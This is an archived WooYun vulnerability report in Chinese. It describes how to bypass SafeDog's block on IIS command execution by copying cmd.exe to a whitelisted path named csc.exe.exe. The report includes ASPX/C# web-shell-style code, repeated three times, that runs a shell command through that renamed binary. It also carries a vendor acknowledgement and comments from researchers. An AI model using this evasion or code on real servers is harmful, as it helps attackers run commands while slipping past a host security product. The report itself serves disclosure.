当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113077

漏洞标题:安全狗禁止执行iis命令绕过

相关厂商:安全狗

漏洞作者: MayIKissYou

提交时间:2015-05-10 00:58

修复时间:2015-08-09 12:58

公开时间:2015-08-09 12:58

漏洞类型:设计错误/逻辑缺陷

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-10: 细节已通知厂商并且等待厂商处理中
2015-05-11: 厂商已经确认,细节仅向厂商公开
2015-05-14: 细节向第三方安全合作伙伴开放
2015-07-05: 细节向核心白帽子及相关领域专家公开
2015-07-15: 细节向普通白帽子公开
2015-07-25: 细节向实习白帽子公开
2015-08-09: 细节向公众公开

简要描述:

安全狗禁止执行iis命令绕过

详细说明:

1:= =安全狗功能越来越狠了,初略看一下大概有如下恶心的事儿:
1):上传防护,如上传aspx和asp就被干掉
2):浏览防护,直接访问aspx马,查杀
3):静态扫描
4):马传上去之后还有一句话连接的防护,就是常见的灭菜刀
5):还有恶意组件禁止执行
6):禁止iis的命令执行
2:前面的1234,zone里经常有人讨论,上传和静态查杀使用之前的zone里发过的内容即可绕过,这里主要说下最后个禁止iis命令执行
3:这里我使用的网站安全狗,版本是3.5版本

safedog1.png


系统是win2003 iis6.0
4:自己创建了一个aspx的页面代码如下:

using System;
using System.Data;
using System.Configuration;
using System.Web;
using System.Web.Security;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.UI.WebControls.WebParts;
using System.Web.UI.HtmlControls;
using System.Diagnostics;
using System.ComponentModel;
public partial class _Default : System.Web.UI.Page 
{
    protected void Page_Load(object sender, EventArgs e)
    {
    }
    protected void btnShow_Click(object sender, EventArgs e)
    {
        
        Process p = new Process();
        p.StartInfo.FileName = "C:\\WINDOWS\\system32\\cmd.exe";
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.RedirectStandardInput = true;
        p.StartInfo.RedirectStandardOutput = true;
        p.StartInfo.RedirectStandardError = true;
        p.StartInfo.CreateNoWindow = true;
        string strOutput = null;
        p.Start();
        p.StandardInput.WriteLine("whoami");
        p.StandardInput.WriteLine("exit");
        strOutput = p.StandardOutput.ReadToEnd();
        p.WaitForExit();
        p.Close();            
	this.lblDisplay.Text = strOutput;
        
    }
}


大致就是点击的时候执行了一个cmd的命令
5:开启安全的时候直接报错了,提示执行了cmd命令

safe2.png


6:这里我们查看了一下白名单,于是有了想法,我把exe文件改成csc.exe.exe,看看行不行,于是我拷贝了一个到C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\csc.exe.exe
7:然后修改代码执行下:

safe3.png


修改后的文件代码:

using System;
using System.Data;
using System.Configuration;
using System.Web;
using System.Web.Security;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.UI.WebControls.WebParts;
using System.Web.UI.HtmlControls;
using System.Diagnostics;
using System.ComponentModel;
public partial class _Default : System.Web.UI.Page 
{
    protected void Page_Load(object sender, EventArgs e)
    {
    }
    protected void btnShow_Click(object sender, EventArgs e)
    {
        
        Process p = new Process();
        p.StartInfo.FileName = "C:\\WINDOWS\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe.exe";
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.RedirectStandardInput = true;
        p.StartInfo.RedirectStandardOutput = true;
        p.StartInfo.RedirectStandardError = true;
        p.StartInfo.CreateNoWindow = true;
        string strOutput = null;
        p.Start();
        p.StandardInput.WriteLine("whoami");
        p.StandardInput.WriteLine("exit");
        strOutput = p.StandardOutput.ReadToEnd();
        p.WaitForExit();
        p.Close();            
	this.lblDisplay.Text = strOutput;
        
    }
}


漏洞证明:

7:然后修改代码执行下:

safe3.png


修改后的文件代码:

using System;
using System.Data;
using System.Configuration;
using System.Web;
using System.Web.Security;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.UI.WebControls.WebParts;
using System.Web.UI.HtmlControls;
using System.Diagnostics;
using System.ComponentModel;
public partial class _Default : System.Web.UI.Page 
{
    protected void Page_Load(object sender, EventArgs e)
    {
    }
    protected void btnShow_Click(object sender, EventArgs e)
    {
        
        Process p = new Process();
        p.StartInfo.FileName = "C:\\WINDOWS\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe.exe";
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.RedirectStandardInput = true;
        p.StartInfo.RedirectStandardOutput = true;
        p.StartInfo.RedirectStandardError = true;
        p.StartInfo.CreateNoWindow = true;
        string strOutput = null;
        p.Start();
        p.StandardInput.WriteLine("whoami");
        p.StandardInput.WriteLine("exit");
        strOutput = p.StandardOutput.ReadToEnd();
        p.WaitForExit();
        p.Close();            
	this.lblDisplay.Text = strOutput;
        
    }
}


修复方案:

版权声明:转载请注明来源 MayIKissYou@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-05-11 12:56

厂商回复:

感谢白帽子的付出。
这个漏洞要利用的话,需要有较高的权限,除此之外,我们也有自己的问题。
我们会尽快修复这个问题。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-05-10 09:16 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    以后还能不能愉快的拿站了

  2. 2015-05-10 12:05 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    关注。

  3. 2015-05-10 12:26 | J0kER ( 实习白帽子 | Rank:56 漏洞数:13 | 上海--求职)

    怎么上的shell

  4. 2015-06-07 01:14 | 流星warden ( 实习白帽子 | Rank:54 漏洞数:8 | The quieter you become,the more you are ...)

    你这不是增加我们提权难度么?